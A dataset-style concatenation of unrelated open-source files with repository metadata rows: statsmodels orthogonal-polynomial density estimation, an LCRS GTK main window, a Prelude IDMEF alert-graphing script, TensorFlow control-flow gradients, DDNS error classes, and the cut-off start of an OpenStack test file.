p2 = polys[j]
if not weight is None:
innp, err = integrate.quad(lambda x: p1(x)*p2(x)*weight(x),
lower, upper)
else:
innp, err = integrate.quad(lambda x: p1(x)*p2(x), lower, upper)
innerprod[i,j] = innp
interr[i,j] = err
if not i == j:
innerprod[j,i] = innp
interr[j,i] = err
return innerprod, interr
def is_orthonormal_cont(polys, lower, upper, rtol=0, atol=1e-08):
'''check whether functions are orthonormal
Parameters
----------
polys : list of polynomials or function
Returns
-------
is_orthonormal : bool
is False if the innerproducts are not close to 0 or 1
Notes
-----
this stops as soon as the first deviation from orthonormality is found.
Examples
--------
>>> from scipy.special import chebyt
>>> polys = [chebyt(i) for i in range(4)]
>>> r, e = inner_cont(polys, -1, 1)
>>> r
array([[ 2. , 0. , -0.66666667, 0. ],
[ 0. , 0.66666667, 0. , -0.4 ],
[-0.66666667, 0. , 0.93333333, 0. ],
[ 0. , -0.4 , 0. , 0.97142857]])
>>> is_orthonormal_cont(polys, -1, 1, atol=1e-6)
False
>>> polys = [ChebyTPoly(i) for i in range(4)]
>>> r, e = inner_cont(polys, -1, 1)
>>> r
array([[ 1.00000000e+00, 0.00000000e+00, -9.31270888e-14,
0.00000000e+00],
[ 0.00000000e+00, 1.00000000e+00, 0.00000000e+00,
-9.47850712e-15],
[ -9.31270888e-14, 0.00000000e+00, 1.00000000e+00,
0.00000000e+00],
[ 0.00000000e+00, -9.47850712e-15, 0.00000000e+00,
1.00000000e+00]])
>>> is_orthonormal_cont(polys, -1, 1, atol=1e-6)
True
'''
for i in range(len(polys)):
for j in range(i+1):
p1 = polys[i]
p2 = polys[j]
innerprod = integrate.quad(lambda x: p1(x)*p2(x), lower, upper)[0]
#print i,j, innerprod
if not np.allclose(innerprod, i==j, rtol=rtol, atol=atol):
return False
return True
#new versions
class DensityOrthoPoly(object):
'''Univariate density estimation by orthonormal series expansion
Uses an orthonormal polynomial basis to approximate a univariate density.
currently all arguments can be given to fit, I might change it to requiring
arguments in __init__ instead.
'''
def __init__(self, polybase=None, order=5):
if not polybase is None:
self.polybase = polybase
self.polys = polys = [polybase(i) for i in range(order)]
#try:
#self.offsetfac = 0.05
#self.offsetfac = polys[0].offsetfactor #polys maybe not defined yet
self._corfactor = 1
self._corshift = 0
def fit(self, x, polybase=None, order=5, limits=None):
'''estimate the orthogonal polynomial approximation to the density
'''
if polybase is None:
polys = self.polys[:order]
else:
self.polybase = polybase
self.polys = polys = [polybase(i) for i in range(order)]
#move to init ?
if not hasattr(self, 'offsetfac'):
self.offsetfac = polys[0].offsetfactor
xmin, xmax = x.min(), x.max()
if limits is None:
self.offset = offset = (xmax - xmin) * self.offsetfac
limits = self.limits = (xmin - offset, xmax + offset)
interval_length = limits[1] - limits[0]
xinterval = xmax - xmin
        # need to cover (half-)open intervals
self.shrink = 1. / interval_length #xinterval/interval_length
offset = (interval_length - xinterval ) / 2.
self.shift = xmin - offset
self.x = x = self._transform(x)
coeffs = [(p(x)).mean() for p in polys]
self.coeffs = coeffs
self.polys = polys
self._verify() #verify that it is a proper density
return self #coeffs, polys
def evaluate(self, xeval, order=None):
xeval = self._transform(xeval)
if order is None:
order = len(self.polys)
res = sum(c*p(xeval) for c, p in zip(self.coeffs, self.polys)[:order])
res = self._correction(res)
return res
def __call__(self, xeval):
'''alias for evaluate, except no order argument'''
return self.evaluate(xeval)
def _verify(self):
'''check for bona fide density correction
currently only checks that density integrates to 1
        non-negativity - not implemented yet
'''
#watch out for circular/recursive usage
#evaluate uses domain of data, we stay offset away from bounds
intdomain = self.limits #self.polys[0].intdomain
self._corfactor = 1./integrate.quad(self.evaluate, *intdomain)[0]
#self._corshift = 0
#self._corfactor
return self._corfactor
def _correction(self, x):
'''bona fide density correction
affine shift of density to make it into a proper density
'''
if self._corfactor != 1:
x *= self._corfactor
if self._corshift != 0:
x += self._corshift
return x
def _transform(self, x): # limits=None):
        '''transform observations to the domain of the polynomial base
        uses the shrink and shift attributes, which are set in fit, to stay
        inside the domain of the polynomials
'''
#use domain from first instance
#class doesn't have domain self.polybase.domain[0] AttributeError
domain = self.polys[0].domain
ilen = (domain[1] - domain[0])
shift = self.shift - domain[0]/self.shrink/ilen
shrink = self.shrink * ilen
return (x - shift) * shrink
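# Worked example for _transform (illustrative numbers): with the Chebyshev
# domain (-1, 1) and limits (0, 4) from fit (so self.shrink = 1/4 and
# self.shift = 0), _transform maps x = 0 -> -1, x = 2 -> 0 and x = 4 -> +1,
# i.e. the data interval [limits[0], limits[1]] is mapped affinely onto the
# domain of the polynomial base.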
#old version as a simple function
def density_orthopoly(x, polybase, order=5, xeval=None):
from scipy.special import legendre, hermitenorm, chebyt, chebyu, hermite
#polybase = legendre #chebyt #hermitenorm#
#polybase = chebyt
#polybase = FPoly
#polybase = ChtPoly
#polybase = hermite
#polybase = HPoly
if xeval is None:
xeval = np.linspace(x.min(),x.max(),50)
#polys = [legendre(i) for i in range(order)]
polys = [polybase(i) for i in range(order)]
#coeffs = [(p(x)*(1-x**2)**(-1/2.)).mean() for p in polys]
#coeffs = [(p(x)*np.exp(-x*x)).mean() for p in polys]
coeffs = [(p(x)).mean() for p in polys]
res = sum(c*p(xeval) for c, p in zip(coeffs, polys))
#res *= (1-xeval**2)**(-1/2.)
#res *= np.exp(-xeval**2./2)
return res, xeval, coeffs, polys
if __name__ == '__main__':
examples = ['chebyt', 'fourier', 'hermite']#[2]
nobs = 10000
import matplotlib.pyplot as plt
from statsmodels.sandbox.distributions.mixture_rvs import (
mixture_rvs, MixtureDistribution)
#np.random.seed(12345)
## obs_dist = mixture_rvs([1/3.,2/3.], size=nobs, dist=[stats.norm, stats.norm],
## kwargs = (dict(loc=-1,scale=.5),dict(loc=1,scale=.75)))
mix_kwds = (dict(loc=-0.5,scale=.5),dict(loc=1,scale=.2))
obs_dist = mixture_rvs([1/3.,2/3.], size=nobs, dist=[stats.norm, stats.norm],
kwargs=mix_kwds)
mix = MixtureDistribution()
#obs_dist = np.random.randn(nobs)/4. #np.sqrt(2)
if "chebyt_" in examples: # needed for Cheby example below
#obs_dist = np.clip(obs_dist, -2, 2)/2.01
#chebyt [0,1]
obs_dist = obs_dist[(obs_dist>-2) & (obs_dist<2)]/2.0 #/4. + 2/4.0
#fourier [0,1]
#obs_dist = obs_dist[(obs_dist>-2) & (obs_dist<2)]/4. + 2/4.0
f_hat, grid, coeffs, polys = density_orthopoly(obs_dist, ChebyTPoly, order=20, xeval=None)
#f_hat /= f_hat.sum() * (grid.max() - grid.min())/len(grid)
f_hat0 = f_hat
from scipy import integrate
fint = integrate.trapz(f_hat, grid)# dx=(grid.max() - grid.min())/len(grid))
#f_hat -= fint/2.
print 'f_hat.min()', f_hat.min()
f_hat = (f_hat - f_hat.min()) #/ f_hat.max() - f_hat.min
fint2 = integrate.trapz(f_hat, grid)# dx=(grid.max() - grid.min())/len(grid))
print 'fint2', fint, fint2
f_hat /= fint2
# note that this uses a *huge* grid by default
#f_hat, grid = kdensityfft(emp_dist, kernel="gauss", bw="scott")
# check the plot
doplot = 0
if doplot:
plt.hist(obs_dist, bins=50, normed=True, color='red')
plt.plot(grid, f_hat, lw=2, color='black')
plt.plot(grid, f_hat0, lw=2, color='g')
plt.show()
for i,p in enumerate(polys[:5]):
for j,p2 in enumerate(polys[:5]):
print i,j,integrate.quad(lambda x: p(x)*p2(x), -1,1)[0]
for p in polys:
print integrate.quad(lambda x: p(x)**2, -1,1)
#examples using the new class
if "chebyt" in examples:
dop = DensityOrthoPoly().fit(obs_dist, ChebyTPoly, order=20)
grid = np.linspace(obs_dist.min(), obs_dist.max())
xf = dop(grid)
#print 'np.max(np.abs(xf - f_hat0))', np.max(np.abs(xf - f_hat0))
dopint = integrate.quad(dop, *dop.limits)[0]
print 'dop F integral', dopint
mpdf = mix.pdf(grid, [1/3.,2/3.], dist=[stats.norm, stats.norm],
kwargs=mix_kwds)
doplot = 1
if doplot:
plt.figure()
plt.hist(obs_dist, bins=50, normed=True, color='red')
plt.plot(grid, xf, lw=2, color='black')
plt.plot(grid, mpdf, lw=2, color='green')
plt.title('using Chebychev polynomials')
#plt.show()
if "fourier" in examples:
dop = DensityOrthoPoly()
dop.offsetfac = 0.5
dop = dop.fit(obs_dist, F2Poly, order=30)
grid = np.linspace(obs_dist.min(), obs_dist.max())
xf = dop(grid)
#print np.max(np.abs(xf - f_hat0))
dopint = integrate.quad(dop, *dop.limits)[0]
print 'dop F integral', dopint
mpdf = mix.pdf(grid, [1/3.,2/3.], dist=[stats.norm, stats.norm],
kwargs=mix_kwds)
doplot = 1
if doplot:
plt.figure()
plt.hist(obs_dist, bins=50, normed=True, color='red')
plt.title('using Fourier polynomials')
plt.plot(grid, xf, lw=2, color='black')
plt.plot(grid, mpdf, lw=2, color='green')
#plt.show()
#check orthonormality:
print np.max(np.abs(inner_cont(dop.polys[:5], 0, 1)[0] -np.eye(5)))
if "hermite" in examples:
dop = DensityOrthoPoly()
dop.offsetfac = 0
dop = dop.fit(obs_dist, HPoly, order=20)
grid = np.linspace(obs_dist.min(), obs_dist.max())
xf = dop(grid)
#print np.max(np.abs(xf - f_hat0))
dopint = integrate.quad(dop, *dop.limits)[0]
print 'dop F integral', dopint
mpdf = mix.pdf(grid, [1/3.,2/3.], dist=[stats.norm, stats.norm],
kwargs=mix_kwds)
doplot = 1
if doplot:
plt.figure()
plt.hist(obs_dist, bins=50, normed=True, color='red')
plt.plot(grid, xf, lw=2, color='black')
plt.plot(grid, mpdf, lw=2, color='green')
plt.title('using Hermite polynomials')
plt.show()
#check orthonormality:
print np.max(np.abs(inner_cont(dop.polys[:5], 0, 1)[0] -np.eye(5)))
#check orthonormality
hpolys = [HPoly(i) for i in range(5)]
inn = inner_cont(hpolys, -6, 6)[0]
print np.max(np.abs(inn - np.eye(5)))
print (inn*100000).astype(int)
from scipy.special import hermite, chebyt
htpolys = [hermite(i) for i in range(5)]
innt = inner_cont(htpolys, -10, 10)[0]
print (innt*100000).astype(int)
polysc = [chebyt(i) for i in range(4)]
r, e = inner_cont(polysc, -1, 1, weight=lambda x: (1-x*x)**(-1/2.))
print np.max(np.abs(r - np.diag(np.diag(r))))
| bsd-3-clause | -6,597,284,244,583,072,000 | 30.351494 | 98 | 0.572958 | false |
benjaoming/lcrs | lcrs/master/ui/mainwindow.py | 2 | 7625 | # -*- coding: utf-8 -*-
#
# LCRS Copyright (C) 2009-2011
# - Benjamin Bach
#
# LCRS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# LCRS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with LCRS. If not, see <http://www.gnu.org/licenses/>.
import gobject, gtk
import os
from lcrs.master.ui.grouppage import GroupPage
from lcrs.master import config_master
from lcrs.master.ui.preferenceswindow import PreferencesWindow
import logging
logger = logging.getLogger('lcrs')
# should be replaced with something from logging module
LOG_ERR, LOG_WARNING, LOG_INFO = range(3)
class MainWindow():
"""
Main class for application window.
REMEMBER THREAD SAFETY!!
"""
def __init__(self, *args, **kwargs):
self.groups = {}
self.computers = {}
self.log = []
self.plugin_hooks = {}
self.plugins = []
self.alive = True
self.master_instance = kwargs['master_instance']
self.config = self.master_instance.get_config()
for plugin_class, options in config_master.ui_plugins.items():
if not options.get('disabled', False):
p = plugin_class(self, self.config)
self.plugins.append(p)
p.activate()
logger.debug("activating %s" % plugin_class.name)
self.glade = gtk.Builder()
self.glade.add_from_file(
os.path.join(config_master.MASTER_PATH, 'ui/glade/mainwindow.glade')
)
self.groupNotebook = self.getWidget('groupNotebook')
self.groupNotebook.remove(self.getWidget('groupPage'))
win = self.getWidget('mainWindow')
win.connect("delete-event", self.on_delete_event)
menu_preferences = self.getWidget('menuitempreferences')
menu_preferences.connect('activate', self.open_preferences)
self.glade.connect_signals(self)
self.getWidget('buttonAddGroup').connect('clicked', self.add_group)
self.win = win
self.win.show()
self.update_overall_status()
self.alert_plugins('on-mainwindow-ready')
def plugin_subscribe(self, hook_id, callback):
old_list = self.plugin_hooks.get(hook_id, [])
old_list.append(callback)
self.plugin_hooks[hook_id] = old_list
def alert_plugins(self, event, *args):
"""We only return a single value, even if there are more than
One plugin. Anything else seems overkill.
"""
return_value = None
for plugin_func in self.plugin_hooks.get(event, []):
return_value = plugin_func(*args)
return return_value
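    # How the hook mechanism above is used (illustrative): a UI plugin calls
    # plugin_subscribe("on-add-computer", callback) from its activate() method,
    # and alert_plugins("on-add-computer", ...) then invokes every callback
    # registered for that hook id; only the return value of the last callback
    # is propagated back to the caller.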
def show(self):
self.win.show()
def on_delete_event(self, *args):
"""
Display manager closed window.
"""
self.main_quit()
return True # Do not destroy
def on_log_menu_activate(self, *args):
f = open(config_master.LOG_FILE, "r")
textbuffer = self.getWidget('textbufferLog')
textbuffer.set_text(f.read())
self.dialog = self.getWidget('dialogLog')
self.dialog.show_all()
self.dialog.connect('delete_event', self.dialog.hide_on_delete)
def on_log_close(self, *args):
self.dialog.hide()
def main_quit(self):
def do_quit(dialog, response_id):
if dialog:
dialog.destroy()
if not response_id == gtk.RESPONSE_YES: return
self.alive = False
self.win.destroy()
gtk.main_quit()
dialog = gtk.MessageDialog(parent=self.win,
type=gtk.MESSAGE_QUESTION,
buttons = gtk.BUTTONS_YES_NO,
message_format="Do you really want to quit LCRS?")
dialog.connect("response", do_quit)
dialog.connect("close", do_quit, gtk.RESPONSE_NO)
dialog.show()
def getWidget(self, identifier):
return self.glade.get_object(identifier)
def _update_overall_status(self):
no_computers = 0
for g in self.groups.keys():
no_computers = no_computers + len(g.computers)
busy_computers = []
for g in self.groups.keys():
busy_computers += filter(lambda c: c.is_active(), g.computers)
finished_computers = []
for g in self.groups.keys():
finished_computers += filter(lambda c: c.wiped and c.is_registered, g.computers)
total_progress = 0.0
no_busy_computers = float(len(busy_computers))
for c in busy_computers:
total_progress += c.progress() / no_busy_computers
# Update window title
if no_busy_computers > 0:
self.win.set_title('LCRS (busy)')
elif no_computers == 0:
self.win.set_title('LCRS')
elif len(finished_computers) == no_computers:
self.win.set_title('LCRS (everything complete)')
else:
self.win.set_title('LCRS (inactive)')
progress_label = "Total computers: %d / Busy: %d" % (no_computers, no_busy_computers)
self.getWidget("labelProgressbarTotal").set_text(progress_label)
self.getWidget('progressbarTotal').set_fraction(total_progress)
def update_overall_status(self):
gobject.idle_add(self._update_overall_status)
def add_group(self):
def do_add_group():
name = self.getWidget("entryGroupname").get_text()
self.master_instance.addGroup(name)
gobject.idle_add(do_add_group)
def appendGroup(self, group):
def do_append_group(group):
"""
Adds a new group to the UI.
"""
assert not group in self.groups, "Group already added."
groupPage = GroupPage(group, self)
self.groupNotebook.insert_page(groupPage.getPageWidget(), groupPage.getLabelWidget(), len(self.groups))
self.groupNotebook.prev_page()
self.groups[group] = groupPage
self.update_overall_status()
gobject.idle_add(do_append_group, group)
def appendComputer(self, computer, group=None):
def do_append_computer(computer, group):
"""
Append a table row to the model object and a page to the notebook.
The page is GtkBuilder'ed from a Glade file.
"""
self.update_overall_status()
if not group:
group = self.groups.keys()[0]
self.groups[group].addComputer(computer)
self.update_overall_status()
gobject.idle_add(do_append_computer, computer, group)
gobject.idle_add(self.alert_plugins, 'on-add-computer')
def update_computer(self, computer):
"""Find a computer in the right group and update its GtkNotebook page..."""
for group in self.groups.keys():
if computer in group.computers:
self.groups[group].update_computer(computer)
def open_preferences(self, *args):
_ = PreferencesWindow()
| gpl-3.0 | -1,067,136,764,861,414,500 | 33.977064 | 115 | 0.595016 | false |
chifflier/libprelude | bindings/tools/idmef-path-gd.py | 4 | 5722 | #!/usr/bin/python
#
# Graph IDMEF Messages
#
import time
import sys
sys.path.append('.')
sys.path.append('./.libs')
import gd
try:
import PreludeEasy
except:
print "Import failed"
print "Try 'cd ./.libs && ln -s libprelude_python.so _PreludeEasy.so'"
sys.exit(1)
#
# GD Constants
#
timeline_x = 100
severity_x = 300
classification_x = 500
header_size_y = 20
image_width = 800
image_height = 400+header_size_y
severity_high_y = 50 + header_size_y
severity_medium_y = 150 + header_size_y
severity_low_y = 250 + header_size_y
severity_info_y = 350 + header_size_y
im = gd.image((image_width, image_height))
white = im.colorAllocate((255, 255, 255))
black = im.colorAllocate((0, 0, 0))
red = im.colorAllocate((255, 0, 0))
orange = im.colorAllocate((255, 100, 0))
blue = im.colorAllocate((0, 0, 255))
green = im.colorAllocate((0, 255, 0))
client = PreludeEasy.Client("PoolingTest")
client.Init()
client.PoolInit("192.168.33.215", 1)
def gd_init():
FONT = "/usr/share/fonts/truetype/ttf-bitstream-vera/VeraMono.ttf"
# Headers
im.line((0,header_size_y),(image_width,header_size_y),black)
im.string_ttf(FONT, 8, 0, (70,12), "timeline", black)
im.line((200,0),(200,header_size_y), black)
im.string_ttf(FONT, 8, 0, (250,12), "impact.severity", black)
im.line((400,0),(400,header_size_y), black)
im.string_ttf(FONT, 8, 0, (450,12), "classification.text", black)
im.line((600,0),(600,header_size_y), black)
# Line for timeline
im.line((timeline_x,header_size_y),(timeline_x,image_height),black)
# Lines for severity
im.line((severity_x,header_size_y),(severity_x,image_height-300),red)
im.line((severity_x,image_height-300),(severity_x,image_height-200),orange)
im.line((severity_x,image_height-200),(severity_x,image_height-100),green)
im.line((severity_x,image_height-100),(severity_x,image_height),blue)
# Line for classification.text
im.line((classification_x,header_size_y),(classification_x,image_height),black)
# return im
gd_init()
def plot_timeline():
t = time.localtime()
hour = t[3]
minute = t[4]
second = t[5]
hour_factor = 400.0 / 24.0
mn_factor = hour_factor / 60.0
hour_y = hour_factor * hour
mn_y = mn_factor * minute
plot_y = hour_y + mn_y
return int(plot_y)
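# Worked example (illustrative): at 12:30, hour_factor = 400/24 ~= 16.67 and
# mn_factor ~= 0.278, so plot_y ~= 16.67*12 + 0.278*30 ~= 208; handle_alert()
# below adds header_size_y before drawing on the timeline axis.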
#
# 10000 can be considered the maximum, since
# it would already cover a fairly long classification.text
#
def unique_alert_number(ClassificationText):
number = 0
for c in ClassificationText:
number += ord(c)
return number
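# Worked example (illustrative): unique_alert_number("ssh") = 115 + 115 + 104 = 334,
# which classification_text_pos() below maps to a y coordinate with the
# 400/10000 scale factor: int(334 * 0.04 + header_size_y) = int(13.36 + 20) = 33.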
def classification_text_pos(text):
classification_factor = 400.0 / 10000.0
nb = unique_alert_number(text)
print "Unique number = " + str(nb)
c_y = classification_factor * nb
print "Position C-Y = " + str(c_y)
return int(c_y + header_size_y)
def handle_alert(idmef):
classificationtext = idmef.Get("alert.classification.text")
print classificationtext
# if value:
# print value
# value = idmef.Get("alert.assessment.impact.description")
# if value:
# print value
# value = idmef.Get("alert.assessment.impact.completion")
# if value:
# print value
# value = idmef.Get("alert.classification.ident")
# if value:
# print value
# value = idmef.Get("alert.source(0).ident")
# if value:
# print value
# value = idmef.Get("alert.classification.ident")
# if value:
# print value
# value = idmef.Get("alert.classification.reference(0).origin")
# if value:
# print value
# value = idmef.Get("alert.classification.reference(0).name")
# if value:
# print value
severity = idmef.Get("alert.assessment.impact.severity")
if severity:
time_y = plot_timeline() + header_size_y
print "Time Y = " + str(time_y)
if severity == "high":
im.line((timeline_x, time_y),(severity_x, severity_high_y), black)
if classificationtext:
c_y = classification_text_pos(classificationtext)
im.line((severity_x, severity_high_y),(classification_x, c_y), black)
if severity == "medium":
im.line((timeline_x, time_y),(severity_x, severity_medium_y), black)
if classificationtext:
c_y = classification_text_pos(classificationtext)
im.line((severity_x, severity_medium_y),(classification_x, c_y), black)
if severity == "low":
im.line((timeline_x, time_y),(severity_x, severity_low_y), black)
if classificationtext:
c_y = classification_text_pos(classificationtext)
im.line((severity_x, severity_low_y),(classification_x, c_y), black)
if severity == "info":
im.line((timeline_x, time_y),(severity_x, severity_info_y), black)
if classificationtext:
c_y = classification_text_pos(classificationtext)
im.line((severity_x, severity_info_y),(classification_x, c_y), black)
# print "hour=" + str(hour) + " mn=" + str(minute)
im.writePng("idmef-graph.png")
while 1:
idmef = client.ReadIDMEF(1)
if idmef:
handle_alert(idmef)
time.sleep(1)
| gpl-2.0 | -7,571,392,418,003,852,000 | 28.647668 | 99 | 0.573401 | false |
moonboots/tensorflow | tensorflow/python/ops/control_flow_grad.py | 2 | 7938 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Gradients for operators defined in control_flow_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
# pylint: disable=wildcard-import,undefined-variable
from tensorflow.python.ops.control_flow_ops import *
from tensorflow.python.ops.gen_control_flow_ops import *
# pylint: enable=wildcard-import
def _SwitchGrad(op, *grad):
"""Gradients for a Switch op is calculated using a Merge op.
If the switch is a loop switch, it will be visited twice. We create
the merge on the first visit, and update the other input of the merge
on the second visit. A next_iteration is also added on second visit.
"""
graph = ops.get_default_graph()
# pylint: disable=protected-access
op_ctxt = op._get_control_flow_context()
grad_ctxt = graph._get_control_flow_context()
# pylint: enable=protected-access
if isinstance(op_ctxt, WhileContext):
merge_op = grad_ctxt.grad_state.switch_map.get(op)
if merge_op:
# This is the second time this Switch is visited. It comes from
# the non-exit branch of the Switch, so update the second input
# to the Merge.
# TODO: Perform shape inference with this new input.
# pylint: disable=protected-access
merge_op._update_input(1, control_flow_ops._NextIteration(grad[1]))
# pylint: enable=protected-access
return None, None
else:
# This is the first time this Switch is visited. It always comes
# from the Exit branch, which is grad[0]. grad[1] is empty at this point.
# Use grad[0] for both inputs to merge for now, but update the second
# input of merge when we see this Switch the second time.
merge_fn = control_flow_ops._Merge # pylint: disable=protected-access
merge_op = merge_fn([grad[0], grad[0]], name="b_switch")[0]
grad_ctxt.grad_state.switch_map[op] = merge_op.op
return merge_op, None
elif isinstance(op_ctxt, CondContext):
good_grad = grad[op_ctxt.branch]
zero_grad = grad[1 - op_ctxt.branch]
# If we are in a grad context, this switch is part of a cond within a
# loop. In this case, we have called ControlFlowState.ZeroLike() so grad
# is ready for merge. Otherwise, we need a switch to control zero_grad.
if not (grad_ctxt and grad_ctxt.grad_state):
dtype = good_grad.dtype
branch = op_ctxt.branch
zero_grad = switch(zero_grad, op_ctxt.pred, dtype=dtype)[1 - branch]
return merge([good_grad, zero_grad], name="cond_grad")[0], None
else:
false_grad = switch(grad[0], op.inputs[1])[0]
true_grad = switch(grad[1], op.inputs[1])[1]
return merge([false_grad, true_grad])[0], None
ops.RegisterGradient("Switch")(_SwitchGrad)
ops.RegisterGradient("RefSwitch")(_SwitchGrad)
@ops.RegisterGradient("Merge")
def _MergeGrad(op, grad, _):
"""Gradients for a Merge op are calculated using a Switch op."""
input_op = op.inputs[0].op
graph = ops.get_default_graph()
# pylint: disable=protected-access
op_ctxt = input_op._get_control_flow_context()
grad_ctxt = graph._get_control_flow_context()
# pylint: enable=protected-access
if isinstance(op_ctxt, WhileContext):
# pylint: disable=protected-access
return control_flow_ops._SwitchRefOrTensor(grad, grad_ctxt.pivot)
# pylint: enable=protected-access
elif isinstance(op_ctxt, CondContext):
pred = op_ctxt.pred
if grad_ctxt and grad_ctxt.grad_state:
# This Merge node is part of a cond within a loop.
# The backprop needs to have the value of this predicate for every
# iteration. So we must have its values accumulated in the forward, and
# use the accumulated values as the predicate for this backprop switch.
grad_state = grad_ctxt.grad_state
real_pred = grad_state.history_map.get(pred.name)
if real_pred is None:
# Remember the value of pred for every iteration.
grad_ctxt = grad_state.grad_context
grad_ctxt.Exit()
history_pred = grad_state.AddForwardAccumulator(pred)
grad_ctxt.Enter()
# Add the stack pop op. If pred.op is in a (outer) CondContext,
# the stack pop will be guarded with a switch.
real_pred = grad_state.AddBackPropAccumulatedValue(history_pred, pred)
grad_state.history_map[pred.name] = real_pred
pred = real_pred
# pylint: disable=protected-access
return control_flow_ops._SwitchRefOrTensor(grad, pred, name="cond_grad")
# pylint: enable=protected-access
else:
num_inputs = len(op.inputs)
cond = [math_ops.equal(op.outputs[1], i) for i in xrange(num_inputs)]
# pylint: disable=protected-access
return [control_flow_ops._SwitchRefOrTensor(grad, cond[i])[1]
for i in xrange(num_inputs)]
# pylint: enable=protected-access
@ops.RegisterGradient("RefMerge")
def _RefMergeGrad(op, grad, _):
return _MergeGrad(op, grad, _)
@ops.RegisterGradient("Exit")
def _ExitGrad(_, grad):
"""Gradients for an exit op are calculated using an Enter op."""
graph = ops.get_default_graph()
# pylint: disable=protected-access
grad_ctxt = graph._get_control_flow_context()
# pylint: enable=protected-access
if not grad_ctxt.back_prop:
# The flag `back_prop` is set by users to suppress gradient
# computation for this loop. If the flag `back_prop` is true,
# no gradient computation.
return None
grad_ctxt.AddName(grad.name)
enter_fn = control_flow_ops._Enter # pylint: disable=protected-access
grad_ctxt.Enter()
result = enter_fn(grad, grad_ctxt.name, is_constant=False,
parallel_iterations=grad_ctxt.parallel_iterations,
name="b_exit")
grad_ctxt.Exit()
return result
ops.RegisterGradient("RefExit")(_ExitGrad)
@ops.RegisterGradient("NextIteration")
def _NextIterationGrad(_, grad):
"""A forward next_iteration is translated into a backprop identity.
Note that the backprop next_iteration is added in switch grad.
"""
return grad
@ops.RegisterGradient("RefNextIteration")
def _RefNextIterationGrad(_, grad):
return _NextIterationGrad(_, grad)
@ops.RegisterGradient("Enter")
def _EnterGrad(op, grad):
"""Gradients for an Enter are calculated using an Exit op.
For loop variables, grad is the gradient so just add an exit.
For loop invariants, we need to add an accumulator loop.
"""
graph = ops.get_default_graph()
# pylint: disable=protected-access
grad_ctxt = graph._get_control_flow_context()
# pylint: enable=protected-access
if not grad_ctxt.back_prop:
# If the flag `back_prop` is true, no gradient computation.
return grad
if op.get_attr("is_constant"):
# Add a gradient accumulator for each loop invariant.
result = grad_ctxt.AddBackPropAccumulator(grad)
else:
result = exit(grad)
grad_ctxt.ExitResult([result])
return result
@ops.RegisterGradient("RefEnter")
def _RefEnterGrad(op, grad):
return _EnterGrad(op, grad)
@ops.RegisterGradient("LoopCond")
def _LoopCondGrad(_):
"""Stop backprop for the predicate of a while loop."""
return None
| apache-2.0 | -2,382,441,656,723,787,300 | 37.533981 | 80 | 0.695767 | false |
nils-wisiol/ddns | src/ddns/errors.py | 1 | 4280 | #!/usr/bin/python
###############################################################################
# #
# ddns - A dynamic DNS client for IPFire #
# Copyright (C) 2012 IPFire development team #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU General Public License for more details. #
# #
# You should have received a copy of the GNU General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
N_ = lambda x: x
class DDNSError(Exception):
"""
Generic error class for all exceptions
raised by DDNS.
"""
reason = N_("Error")
def __init__(self, message=None):
self.message = message
class DDNSNetworkError(DDNSError):
"""
Thrown when a network error occured.
"""
reason = N_("Network error")
class DDNSAbuseError(DDNSError):
"""
Thrown when the server reports
abuse for this account.
"""
reason = N_("The server denied processing the request because account abuse is suspected")
class DDNSAuthenticationError(DDNSError):
"""
Thrown when the server did not
accept the user credentials.
"""
reason = N_("Authentication against the server has failed")
class DDNSBlockedError(DDNSError):
"""
Thrown when the dynamic update client
(specified by the user-agent) has been blocked
by a dynamic DNS provider.
"""
reason = N_("The server denies any updates from this client")
class DDNSConfigurationError(DDNSError):
"""
Thrown when invalid or insufficient
data is provided by the configuration file.
"""
reason = N_("The configuration file has errors")
class DDNSConnectionRefusedError(DDNSNetworkError):
"""
Thrown when a connection is refused.
"""
reason = N_("Connection refused")
class DDNSConnectionTimeoutError(DDNSNetworkError):
"""
Thrown when a connection to a server has timed out.
"""
reason = N_("Connection timeout")
class DDNSHostNotFoundError(DDNSError):
"""
Thrown when a configuration entry could
not be found.
"""
reason = N_("The host could not be found in the configuration file")
class DDNSInternalServerError(DDNSError):
"""
Thrown when the remote server reported
an error on the provider site.
"""
reason = N_("Internal server error")
class DDNSNetworkUnreachableError(DDNSNetworkError):
"""
Thrown when a network is not reachable.
"""
reason = N_("Network unreachable")
class DDNSNoRouteToHostError(DDNSNetworkError):
"""
Thrown when there is no route to a host.
"""
reason = N_("No route to host")
class DDNSNotFound(DDNSError):
"""
Thrown when the called URL has not been found
"""
reason = N_("Not found")
class DDNSRequestError(DDNSError):
"""
Thrown when a request could
not be properly performed.
"""
reason = N_("Request error")
class DDNSResolveError(DDNSNetworkError):
"""
Thrown when a DNS record could not be resolved
because of a local error.
"""
reason = N_("Could not resolve DNS entry")
class DDNSServiceUnavailableError(DDNSNetworkError):
"""
Equivalent to HTTP error code 503.
"""
reason = N_("Service unavailable")
class DDNSUpdateError(DDNSError):
"""
Thrown when an update could not be
properly performed.
"""
reason = N_("The update could not be performed")
| gpl-3.0 | 8,554,441,590,693,067,000 | 26.792208 | 91 | 0.589252 | false |
ctrlaltdel/neutrinator | vendor/openstack/tests/unit/load_balancer/test_quota.py | 3 | 2997 | # Copyright (c) 2018 China Telecom Corporation
